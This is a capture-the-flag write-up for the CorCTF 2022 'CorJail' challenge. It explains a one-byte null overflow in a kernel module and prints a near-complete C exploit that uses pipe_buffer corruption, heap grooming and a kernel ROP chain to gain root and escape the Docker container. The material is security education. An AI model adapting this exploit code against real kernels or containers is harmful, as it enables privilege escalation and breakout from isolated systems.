OFF-BY-NULL to Docker Escaping: CorJail (CorCTF 2022)
đź“‘Â Prologue
This is a write-up documenting a trial for the CTF challenge CorJail from CorCTF 2022. The challenge resource is avaliable on corCTF Github repo. The author’s write up is also good study resources. I exploited it by myself so using an different method. I’ll introduced the tiny problems I encountered and talk about the technical skills required for this challenge.
🏔️ Build the Enviroment
In the official github repo, not like other challenges, we only have bzImage
but not filesystem
. To reproduce the challenge, we have to rebuild the filesystem
. The infrastructure is in the pwn/corjail/task/build/
dir. I found it’s hard to finish the enviroment building on my ubuntu22.04 but easy on ubuntu20.04. I used build_image.sh
script to build the filesystem
.
Considering the complex setup of this challenge. I also did some modifications to make the local debugging simpler. In this challenge, we are asked to first exploit a bug in a kernel module to get root privilege and than escape the docker container. If we have the correct enviroment, we gonna have a shell in a docker container, which is running in a QEMU VM. To ease debugging, we need to support the following two features:
- Get a root shell on the QEMU VM so we can get the kernel information (
kallsyms, module
) easier - Upload EXP (our exploiting binary): I include a static
netcat
binary and modified theinit
/jail
scripts(/usr/local/bin
) on the QEMU VM to support this feature. But I noticed there is network andcurl
after I solved the challenge read the official write up. In my method I kept running a script at backgroun after adding some forwarding settings for QEMU(-net user,hostfwd=tcp::49999-:49998
):
#!/bin/bash
while true
do
nc -lp 49998 > /exp
chmod +x /exp
docker cp /exp `docker ps -aq`:/
done
After build the filesystem
including debugging tools, we can run it with the ./run_challenge.sh
script and get a user
privileged shell in the docker container with a very cool CoROS
logo. If we throw a binary to the 49999 port on the host (cat ./exp | nc -v 0.0.0.0 49999
) we gonna see an EXP binary in the docker container.
🎮 Challenge
The challenge implemened a kernel module enabling syscall usage monitoring. If we reverse the kernel module (cormon.ko
), it’s not hard to locate the bug in cormon_proc_write
:
kheap_obj = (char *)kmem_cache_alloc_trace(kmalloc_caches[12], 2592LL, 4096LL);
printk(&unk_578, kheap_obj);
if ( kheap_obj )
{
_check_object_size(kheap_obj, length_user, 0LL);
if ( copy_from_user(kheap_obj, a2, length_user) )
{
printk(&unk_5D0, a2);
return -14LL;
}
else
{
kheap_obj[length_user] = 0; // Overflow with a null byte
if ( (unsigned int)update_filter(kheap_obj) )
{
kfree(kheap_obj);
return -22LL;
}
...
The bug is an overflow bug but there is one null byte overflow on a 0x1000 object. There are two important facts about this vulnerability:
- The obejct size is fixed to be 0x1000 bytes
- Overflow a null byte
This bug is not hard to exploit for me since I exploited a similar bug with a simmilar method.
🗡️ Solution
We have to use the additional null byte corrput some metadata to gain more control and there is a perfect candidate for that: pipe_buffer
. There is an page address at the offset 0 for pipe_buffer
, which means we can overwrite it to point to another page:
struct pipe_buffer {
struct page * page; /* 0 8 */
unsigned int offset; /* 8 4 */
unsigned int len; /* 12 4 */
const struct pipe_buf_operations * ops; /* 16 8 */
unsigned int flags; /* 24 4 */
/* XXX 4 bytes hole, try to pack */
long unsigned int private; /* 32 8 */
/* size: 40, cachelines: 1, members: 6 */
/* sum members: 36, holes: 1, sum holes: 4 */
/* last cacheline: 40 bytes */
};
Here is my gdb functions to transfer a page struct address to a virtual address:
set $VM=0xffff888000000000
set $BASE=0xffffffff81000000
set $PAGE=0xffffea0000000000
define p2v
p/x ($arg0-$PAGE)*0x40+$VM
end
define v2p
p/x ($arg0-$VM)/0x40+$PAGE
end
Assuming we have a pipe struct next to the vulnerable object that ends with 0x40 (e.g., 0xffffea0000000040
).If we overflow and change it to 0xffffea0000000000
, it points to a page before the page it should point to and enable our AAW/AAR on that page.
So our plan is:
- Spray lots of
pipe_buffer
list obejcts (size=0x1000) - Create a hole in them
- Trigger the bug to overwrite the page struct address in
pipe_buffer
- Arbitrary Read to leak
- Arbitrary Write to gain control flow hijacking
I chose the file objects as my targets since I can get the heap address simply from it and it has the f_op
as the control flow hijacking target. There is a tip when we are attacking objects using pipe_buffer AAR/AAW that we should not modify the unesscessary data (especially in a docker container enviroment). I spent so much time since I currupted the data and trigger a null pointer dereference killing the kernel (eventpoll_release_file
). Using some kernel heap fengshui skills gaining control flow hijacking is not hard. However, I have no experience to escape from a dcoekr container.
🚀 Docker Escape
Getting the information from my labmates daily chat, I only heard that is not hard as long as people have control flow hijacking. So I search for some kernelCTF script and find there are some articles and exploitation scripts to do that. I first tried the method mentioned on CVE-2021-22555.
- Kernel ROP to
switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
- setns in usermode to escape
setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
setns(open("/proc/1/ns/pid", O_RDONLY), 0);
setns(open("/proc/1/ns/net", O_RDONLY), 0);
char *args[] = {"/bin/bash", "-i", NULL};
execve(args[0], args, NULL);
This method changes the namespaces for the task belonging to pid=1
to init_nsproxy
. It sounds but it didn’t work well for me. I read more recent exploits from kernelCTF repo for CVE-2023-5345_lts_mitigation. This exploit uses a similar method performing the similar options: getting the task for current pid’s task and replace it with init_nsproxy
. But it performs the switch
option manually instead of using switch_task_namespaces
. It worked for me!
The rop chain I used is quite similar to the one from kernelCTF
// commit_creds(init_cred)
ptr[index++] = rdi+1;
ptr[index++] = rdi;
ptr[index++] = init_cred;
ptr[index++] = commit_creds;
// mov [find_task_by_vpid(getpid())+1760], init_fs
ptr[index++] = rdi;
ptr[index++] = getpid();
ptr[index++] = find_task_by_vpid;
ptr[index++] = rcx;
ptr[index++] = 1760;
ptr[index++] = add_rax_rcx_ret ;
ptr[index++] = rsi ;
ptr[index++] = init_fs ;
ptr[index++] = mov_qword_ptr_rax_rsi_ret;
// land userspace
ptr[index++] = swap_gs_iret;
ptr[index++] = 0;
ptr[index++] = 0;
ptr[index++] = shellx;
ptr[index++] = user_cs;
ptr[index++] = user_rflags;
ptr[index++] = user_sp|8;
ptr[index++] = user_ss;
⚔️ EXP
#include "libx.h"
// https://github.com/n132/libx.git
#define NR_PIPE 0x7
int fd = 0 ;
size_t pivot, RBP_VAL;
void tainRegs(u64 base,u64 heap){
pivot = 0xffffffff819a71fc - NO_ASLR_BASE + base;
RBP_VAL = heap;
__asm__("mov rax, 0x9999999999999990;"
"mov rbx, 0x9999999999999991;"
"mov rcx, 0x9999999999999992;"
"mov rdx, 0x9999999999999993;"
"mov rdi, 0x9999999999999994;"
"mov rsi, 0x9999999999999995;"
"mov r8, 0x9999999999999996;"
"mov r9, 0x9999999999999997;"
"mov r10, 0x9999999999999998;"
"mov r11, 0x9999999999999999;"
"mov r12, 0x999999999999999a;"
"mov r13, pivot;"
"mov r14, 0x99999999999999fc;"
"mov r15, RBP_VAL;"
"leave;"
"ret;");
}
void shellx(){
char *sh_args[] = {"sh", NULL};
execve("/bin/sh", sh_args, NULL);
while(1);
}
void _sigsegv_handler2(int sig, siginfo_t *si, void *unused) {
info("Libx: SegFault Handler is spwaning a shell...");
shellx();
while(1); // Techniquly, we never his this line
}
void hook_segfault2(){
struct sigaction sa;
memset(&sa, 0, sizeof(sigaction));
sigemptyset(&sa.sa_mask);
sa.sa_flags = SA_SIGINFO;
sa.sa_sigaction = _sigsegv_handler2;
if (sigaction(SIGSEGV, &sa, NULL) == -1) {
perror("hook_segfault");
exit(EXIT_FAILURE);
}
// info("SegFault Hooked");
}
void libxInitX(){
pinCPU(0);
impLimit();
hook_segfault2();
initPipeBuffer(pipe_fd);
initSocketArray(sk_fd);
success("Libx Inited");
}
int attempt(){
char *T = malloc(0x10000);
memset(T,0,0x10000);
memset(T,'i',0x1000);
memcpy(T,p64(0xdeadbeef),8);
fd = open("/proc_rw/cormon",2);
libxInitX();
int fds[0x400] = {};
for(int i = 0 ; i < 0x180 ;i++)
fds[i] = open("/etc/passwd",0);
int fengshui[2];
pipe(fengshui);
int shuifeng[2];
pipe(shuifeng);
pipeBufferResize(fengshui[0],0x40);
pipeBufferResize(shuifeng[0],0x40);
// 0x40*0x28 = 0xa00
int victim[NR_PIPE][2];
for(int i = 0 ; i < NR_PIPE;i++)
pipe(victim[i]);
for(int i = 0 ; i < 0x1c; i++)
for(int j = 0 ; j < 0x6;j++)
write(sk_fd[i][1],T,0x1000-0x140);
for(int i = 0x1c ; i < 0x20; i++)
write(sk_fd[i][1],T,0x1000-0x140);
// Poke 4 holes
for(int i = 0x1c ; i < 0x20; i++)
read(sk_fd[i][0],T+0x8000,0x1000-0x140);
// Fill the holes
for(int i = 0 ; i < NR_PIPE; i++)
pipeBufferResize(victim[i][0],0x40);
// Fengshui
for(int i = 0 ; i < 0x40; i++)
write(fengshui[1],T,0x1000); // Lift the end
int ct = 0x180;
for(int z =0 ;z <NR_PIPE; z++)
{
memcpy(T,p64(0xcafebabe000+z),8);
write(victim[z][1],T,0xc28);
for(int i = 0x20 ; i < 0x40 ;i++)
fds[ct++] = open("/etc/passwd",0);
}
// debug();
read(sk_fd[0x1c-1][0],T+0x8000,0x1000-0x140);
write(fd,T+0x6000,0x1000);
// debug();
size_t TARGET_ADDR = 0;
size_t KASLR = 0;
size_t idx = -1;
char buf[0x100]={};
for(int i = 0 ; i < NR_PIPE ;i++)
{
memset(buf,0,0x100);
read(victim[i][0],buf,0x100);
size_t permission = *(size_t *)(buf+0x40);
if(0x6c0a801d04048000 == permission)
{
TARGET_ADDR = *(size_t *)(buf+0x58) -0x58;
KASLR = *(size_t *)(buf+0x28) - 0x1040400;
if(KASLR&0xfffff){
KASLR = (KASLR+0x800000)>>24<<24;
}
idx = i;
goto ALIVE;
}
}
warn("đź’” Unfortunately...");
exit(0);
ALIVE:
success(hex(KASLR));
success(hex(TARGET_ADDR));
size_t * ptr = 0;
ptr = (size_t *)(buf+0x28);
*ptr = (size_t *)((TARGET_ADDR>>12<<12)+0x20000 -0x78);
ptr = T;
int index = 0 ;
memset(ptr,0,0x1000);
size_t rdi = 0xffffffff819e52dd - NO_ASLR_BASE + KASLR;
size_t rcx = 0xffffffff8192f977 - NO_ASLR_BASE + KASLR;
size_t rdx = 0xffffffff81a0518a - NO_ASLR_BASE + KASLR;
size_t rsi = 0xffffffff81a0edd8 - NO_ASLR_BASE + KASLR;
size_t gadget = 0xffffffff8111138a - NO_ASLR_BASE + KASLR;
size_t init_cred = 0xffffffff8245a960 - NO_ASLR_BASE + KASLR;
size_t commit_creds = 0xffffffff810eba40 - NO_ASLR_BASE + KASLR;
size_t swap_gs_iret = 0xffffffff81c00f06 - NO_ASLR_BASE + KASLR;
size_t init_nsproxy = 0xffffffff8245a720 - NO_ASLR_BASE + KASLR;
size_t add_rax_rcx_ret = 0xffffffff810587d3 - NO_ASLR_BASE + KASLR;
size_t find_task_by_vpid = 0xffffffff810e4fc0 - NO_ASLR_BASE + KASLR;
size_t switch_task_namespaces = 0xffffffff810ea4e0 - NO_ASLR_BASE + KASLR;
size_t mov_qword_ptr_rax_rsi_ret= 0xffffffff815b55c1 - NO_ASLR_BASE + KASLR;
size_t init_fs = 0xffffffff82589740 - NO_ASLR_BASE + KASLR;
ptr[index++] = gadget;
saveStatus();
index = 0x21;
ptr[index++] = rdi+1;
ptr[index++] = rdi;
ptr[index++] = init_cred;
ptr[index++] = commit_creds;
ptr[index++] = rdi;
ptr[index++] = getpid();
ptr[index++] = find_task_by_vpid;
ptr[index++] = rcx;
ptr[index++] = 1760;
ptr[index++] = add_rax_rcx_ret ;
ptr[index++] = rsi ;
ptr[index++] = init_fs ;
ptr[index++] = mov_qword_ptr_rax_rsi_ret;
ptr[index++] = swap_gs_iret;
ptr[index++] = 0;
ptr[index++] = 0;
ptr[index++] = shellx;
ptr[index++] = user_cs;
ptr[index++] = user_rflags;
ptr[index++] = user_sp|8;
ptr[index++] = user_ss;
for(int i = 0 ; i < 0x40; i++)
write(shuifeng[1],T,0x1000);
debug();
size_t res = write(victim[idx][1],buf+0x28,8);
success("🚀 Escaping...");
tainRegs(KASLR,(size_t *)((TARGET_ADDR>>12<<12)+0x20000+0x100));
for(int i = 0 ; i < ct ; i++)
close(fds[i]);
exit(0);
}
int main(){
while(1) {
if(!fork())
attempt();
else
wait(NULL);
}
}
🧙🏽‍♂️ Epilogue
This challenge is a complete one including bug discovery, exploitation, and docker escaping. I practiced some pipe_buffer / fengshui skills on this challenge and performed my first docker escaping!
Also, thsi challenges mean very much to me since it’s the last CTF challenge Kyle sent me for practicing. I made it independetly within two days. Now I can confidently say that I know some kernel exploiation and I am ready to start CVE reproducing!